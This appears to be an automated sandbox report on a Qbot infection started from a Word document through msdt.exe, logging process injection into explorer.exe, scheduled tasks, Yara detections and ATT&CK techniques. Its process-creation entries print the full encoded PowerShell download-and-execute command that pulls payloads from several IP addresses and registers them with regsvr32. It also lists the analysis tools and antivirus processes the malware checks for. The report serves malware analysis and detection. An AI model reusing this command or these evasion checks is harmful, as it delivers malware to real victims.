                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: explorer.exe, 00000021.00000003.679709258.0000000003442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE-
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE2
                            Source: explorer.exe, 00000021.00000003.679709258.0000000003442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5152Thread sleep count: 120 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5332Thread sleep count: 120 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 2212Thread sleep count: 66 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 5996Thread sleep count: 49 > 30
                            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_27-13399
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1365Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_27-11569
                            Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499DD62 GetSystemInfo,27_2_0499DD62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499BCFC FindFirstFileW,FindNextFileW,27_2_0499BCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042ABCFC FindFirstFileW,FindNextFileW,28_2_042ABCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFBCFC FindFirstFileW,FindNextFileW,29_2_04AFBCFC
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F8BCFC FindFirstFileW,FindNextFileW,32_2_02F8BCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499EEBB LoadLibraryA,GetProcAddress,27_2_0499EEBB
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory protected: page write copy | page execute and write copy | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Maps a DLL or memory area into another process
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                            Writes to foreign memory regions
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2FB0000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 90F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2E90000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 90F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2EF0000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 90F380Jump to behavior
                            Allocates memory in foreign processes
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2FB0000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2E90000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2EF0000 protect: page read and writeJump to behavior
                            Injects code into the Windows Explorer (explorer.exe)
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4384 base: 2FB0000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4384 base: 90F380 value: E9Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2256 base: 2E90000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2256 base: 90F380 value: E9Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5492 base: 2EF0000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5492 base: 90F380 value: E9Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499A065 GetSystemTimeAsFileTime,27_2_0499A065
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499DF3D GetCurrentProcessId,LookupAccountSidW,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,27_2_0499DF3D
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Qbot
                            Source: Yara matchFile source: 27.2.regsvr32.exe.4990000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4ad0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43c0184.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.810184.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43f0000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4ad0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4aa0184.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4af0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.4280000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4af0000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.42a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4aa0184.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.4280000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.42a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43c0184.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.4990000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.810184.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Yara detected CryptOne packer
                            Source: Yara matchFile source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                            Remote Access Functionality

                            barindex
                            Yara detected Qbot
                            Source: Yara matchFile source: 27.2.regsvr32.exe.4990000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4ad0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43c0184.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.810184.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43f0000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4ad0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4aa0184.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4af0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.4280000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4af0000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.42a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4aa0184.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.4280000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.42a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43c0184.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.4990000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.810184.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Yara detected CryptOne packer
                            Source: Yara matchFile source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts1
                            Command and Scripting Interpreter                            		1
                            Scheduled Task/Job                            		411
                            Process Injection                            		11
                            Masquerading                            		1
                            Credential API Hooking                            		1
                            System Time Discovery                            		Remote Services1
                            Credential API Hooking                            		Exfiltration Over Other Network Medium1
